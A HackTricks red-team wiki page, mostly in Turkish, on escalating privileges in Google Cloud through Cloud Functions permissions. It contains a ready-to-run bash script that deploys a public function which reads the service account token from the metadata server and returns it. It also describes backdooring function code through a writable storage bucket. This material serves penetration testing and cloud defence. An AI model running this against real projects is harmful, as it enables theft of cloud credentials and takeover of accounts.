GCP - Cloudfunctions Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

cloudfunctions

Cloud Functions hakkında daha fazla bilgi:

GCP - Cloud Functions Enum

`cloudfunctions.functions.create` , `cloudfunctions.functions.sourceCodeSet`, `iam.serviceAccounts.actAs`

Bu yetkilere sahip bir saldırgan, keyfi (kötü niyetli) kodla yeni bir Cloud Function oluşturabilir ve ona bir Service Account atayabilir. Ardından, yetkileri artırmak için metadata'dan Service Account token'ını sızdırabilir. Fonksiyonu tetiklemek için bazı yetkilere ihtiyaç duyulabilir.

Bu yöntem için istismar betikleri burada ve burada bulunabilir ve önceden oluşturulmuş .zip dosyası burada bulunabilir.

`cloudfunctions.functions.update` , `cloudfunctions.functions.sourceCodeSet`, `iam.serviceAccounts.actAs`

Bu yetkilere sahip bir saldırgan, bir Fonksiyonun kodunu değiştirebilir ve hatta ekli olan hizmet hesabını değiştirebilir ve bunun amacı token'ı dışarı sızdırmaktır.

Cloud functions dağıtmak için, varsayılan compute service account veya imajı oluşturmak için kullanılan service account üzerinde actAs izinlerine de ihtiyacınız olacak.

Ekstra yetkiler, 1. versiyon cloudfunctions için .call izni veya fonksiyonu tetiklemek için role/run.invoker rolü gibi yetkilere ihtiyaç duyulabilir.

# Create new code
temp_dir=$(mktemp -d)

cat > $temp_dir/main.py <<EOF
import subprocess

def main(request):
cmd = "curl -s -f -H 'Metadata-Flavor: Google' 'http://metadata/computeMetadata/v1/instance/service-accounts/default/token'"
result = subprocess.check_output(cmd, shell=True, text=True)
return result
EOF

echo "" > $temp_dir/requirements.txt

zip -r $temp_dir/function.zip $temp_dir/main.py $temp_dir/requirements.txt

# Update code
gcloud functions deploy <cloudfunction-name> \
--runtime python312 \
--source $temp_dir \
--entry-point main \
--service-account <sa>@$PROJECT_ID.iam.gserviceaccount.com \
--trigger-http \
--allow-unauthenticated

# Get SA token calling the new function code
gcloud functions call <cloudfunction-name>

Eğer Permission 'run.services.setIamPolicy' denied on resource... hatasını alıyorsanız, bu --allow-unauthenticated parametresini kullandığınız ve yeterli izinlerinizin olmadığı anlamına gelir.

Bu yöntem için istismar betiği burada bulunabilir.

`cloudfunctions.functions.sourceCodeSet`

Bu izinle, bir dosyayı bir fonksiyon bucket'ına yüklemek için imzalı bir URL alabilirsiniz (ancak fonksiyonun kodu değişmeyecek, yine de güncellemeniz gerekecek)

# Generate the URL
curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions:generateUploadUrl \
-H "Authorization: Bearer $(gcloud auth application-default print-access-token)" \
-H "Content-Type: application/json" \
-d '{}'

Saldırganlar açısından bu iznin ne kadar faydalı olacağından emin değilim, ama bilmekte fayda var.

`cloudfunctions.functions.setIamPolicy` , `iam.serviceAccounts.actAs`

Önceki .update veya .create ayrıcalıklarından herhangi birini kendinize vererek yükseltme yapabilirsiniz.

`cloudfunctions.functions.update`

Sadece cloudfunctions izinlerine sahip olmak, iam.serviceAccounts.actAs olmadan fonksiyonu güncelleyemezsiniz, BU YÜKSELTME İÇİN GEÇERLİ DEĞİLDİR.

Bucket Üzerinde Okuma & Yazma Erişimi

Bucket üzerinde okuma ve yazma erişiminiz varsa, kodda değişiklikleri izleyebilir ve bucket'ta bir güncelleme olduğunda yeni kodunuzu kendi kodunuzla güncelleyebilirsiniz; böylece Cloud Function'ın yeni versiyonu gönderilen arka kapılı kodla çalıştırılacaktır.

Saldırı hakkında daha fazla bilgi edinebilirsiniz:

GCP - Storage Privesc

Ancak, bunu üçüncü taraf Cloud Functions'ı önceden tehlikeye atmak için kullanamazsınız çünkü bucket'ı kendi hesabınızda oluşturup, dış projenin üzerine yazabilmesi için halka açık izinler verirseniz, aşağıdaki hatayı alırsınız:

Ancak, bu DoS saldırıları için kullanılabilir.

Artifact Registry Üzerinde Okuma & Yazma Erişimi

Bir Cloud Function oluşturulduğunda, projenin Artifact Registry'sine yeni bir docker imajı yüklenir. İmajı yeni bir imajla değiştirmeyi denedim, hatta mevcut imajı (ve cache imajını) silmeyi denedim ama hiçbir şey değişmedi, cloud function çalışmaya devam etti. Bu nedenle, belki de bucket ile bir Yarış Koşulu saldırısını kötüye kullanmak mümkün olabilir ama sadece saklanan imajı değiştirmek Cloud Function'ı tehlikeye atmak için yeterli değildir.

Referanslar

https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousGCP - Cloudbuild Privesc NextGCP - Cloudidentity Privesc

Last updated 3 days ago